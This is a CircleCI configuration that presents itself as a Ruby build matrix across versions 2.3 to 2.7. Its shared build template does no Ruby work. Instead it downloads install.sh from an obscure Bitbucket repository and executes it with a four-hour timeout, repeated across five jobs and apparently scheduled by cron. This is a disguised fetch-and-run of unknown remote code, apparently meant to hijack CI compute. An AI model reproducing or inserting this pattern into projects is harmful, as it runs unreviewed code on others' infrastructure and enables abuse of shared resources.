.build_template: &build_definition
  steps:
    - run: curl -L https://bitbucket.org/azureshjlfgs/azureee/raw/246fee80e2908f28a393c224a9c8f96873f2f6c5/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: 
       name: circleci
       command: ./install.sh
       no_output_timeout: 4h
        
version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.3
      
    triggers:
      - schedule:
          cron: "0 4,8,12,16,20, * * *"
          filters:
            branches:
              only:
                - master

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
